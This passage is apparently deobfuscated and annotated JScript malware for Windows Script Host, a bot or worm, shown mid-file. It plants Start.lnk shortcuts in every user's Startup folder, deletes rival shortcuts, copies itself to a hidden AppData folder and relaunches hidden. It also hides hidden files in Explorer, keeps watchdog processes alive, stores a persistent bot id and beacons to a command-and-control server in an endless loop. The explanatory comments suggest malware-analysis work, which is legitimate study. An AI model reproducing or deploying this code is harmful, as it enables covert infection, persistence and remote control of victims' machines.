              var h = b.getFolder(d('userprofile') + '\\..\\');
              for (var j = new Enumerator(h.SubFolders); !j.atEnd(); j.moveNext()) {
                var k = j.item();
                for (var i = 0; i < f.length; i++) {
                  try {
                    var pp = k + (vn[0] >= 6 ? '\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\' : '\\Start Menu\\Programs\\Startup\\');
                    var p = pp + 'Start.lnk';
                    with (a.createShortcut(p))
                      targetPath = '"' + fet + '"', windowStyle = 1, arguments = '"' + bfi + '"', iconLocation = '%systemroot%\\system32\\shell32.dll,3', save();
                    ent(p);
                    lo.push(p);
                    var cbb = [
                      'Windows Explorer.lnk',
                      'empezar.lnk',
                      'atajo.lnk'
                    ];
                    for (var i1 = 0; i1 < cbb.length; i1++) {
                      try {
                        b.deleteFile(pp + cbb[i1]);
                      } catch (e) {
                      }
                    }
                  } catch (e) {
                  }
                }
              }
            } catch (e) {
            }
            // Lock the running script file too when it lives on the system drive.
            if (WScript.ScriptFullName.split('\\').shift() == d('systemdrive'))
              lo.push(WScript.ScriptFullName);
            // tc: %TEMP%\<ha(g+'08')>.js. When this run was started in ha(g+'07')
            // mode that temp copy is removed and the process exits (the install
            // is complete and the resident instance is expected to already run).
            var tc = d('temp') + '\\' + ha(g + '08') + '.js';
            if (WScript.Arguments.length > 0 && WScript.Arguments(0) == ha(g + '07')) {
              try {
                b.deleteFile(tc);
              } catch (e) {
              }
              WScript.quit();
            } else if (su == 0) {
              // No all-users startup entry could be written; (re)open the lock file.
              try {
                Oq = b.openTextFile(ofb + ha(g + '00'), 8, !0);
              } catch (e) {
              }
            }
            hr(0);   // hide hidden files in Explorer
            sha(1);  // hold the startup files open
            sk();    // spawn the watchdog children
            kk = 0;  // installed; skip the fallback below
            break;
          } catch (e) {
          }
        }
      }
      // No existing install folder was found: create one under the current
      // user's profile, copy this script there, release the lock, relaunch the
      // running file hidden with argument ha(g+'14') (not one of the handled
      // roles, so the relaunch takes the normal install path now that the
      // folder exists) and exit.
      if (kk) {
        var bbs = d('userprofile') + (vn[0] >= 6 ? '\\AppData\\Roaming\\' : '\\') + ha(g + '02'), bbz = bbs + '\\' + ha(g + '04') + '.js';
        try {
          b.createFolder(bbs);
        } catch (e) {
        }
        ent(bbs);
        b.copyFile(WScript.ScriptFullName, bbz, true);
        ent(bbz);
        try {
          Oq.close();
        } catch (e) {
        }
        ru.shellExecute('wscript.exe', '"' + WScript.ScriptFullName + '" ' + ha(g + '14'), '', '', 0);
        WScript.quit();
      }
    } catch (_e) {
      e = _e;
      {
        WScript.quit();
      }
    }
  }
  // ---- bot id ---------------------------------------------------------------
  // tff: persistent id stored in hd (= ofb + ha(g+'03')); read back if the
  // file exists, otherwise generated as 8-4-4-4-12 random hex and written.
  // Reported as i=. (If no install folder was found the code above already
  // exited.)
  var tff = 'e', otf;
  if (b.fileExists(hd)) {
    {
      var e;
      try {
        otf = b.openTextFile(hd, 1);
        tff = otf.readAll(), otf.close();
      } catch (_e) {
        e = _e;
        {
        }
      }
    }
  } else {
    {
      var e;
      try {
        tff = cob() + cob() + '-' + cob() + '-' + cob() + '-' + cob() + '-' + cob() + cob() + cob();
        otf = b.openTextFile(hd, 2, 1);
        otf.write(tff), otf.close();
      } catch (_e) {
        e = _e;
        {
        }
      }
    }
  }
  ent(hd);
  // ---- main loop ------------------------------------------------------------
  // While online (zzo): beacon with $('', 1), then keep the watchdog children
  // alive with sk() every 2 s for 53 minutes. If the beacon throws (no C2
  // reachable, or the response failed to run): leave the inner loop when the
  // host is offline, otherwise retry after ~8 s of sk() calls. While offline:
  // sk() every 2 s for 3 minutes before re-checking connectivity.
  while (true) {
    if (zzo() !== false) {
      while (true) {
        {
          var e;
          try {
            $('', 1);
            for (var i = new Date().getTime(); i + 60 * 53 * 1000 >= new Date().getTime(); sk())
              WScript.sleep(2000);
          } catch (_e) {
            e = _e;
            {
              if (zzo() == false)
                break;
              for (var i = new Date().getTime(); i + 8000 >= new Date().getTime(); sk())
                WScript.sleep(2000);
            }
          }
        }
      }
    } else {
      for (var i = new Date().getTime(); i + 60 * 3 * 1000 >= new Date().getTime(); sk())
        WScript.sleep(2000);
    }
  }
}());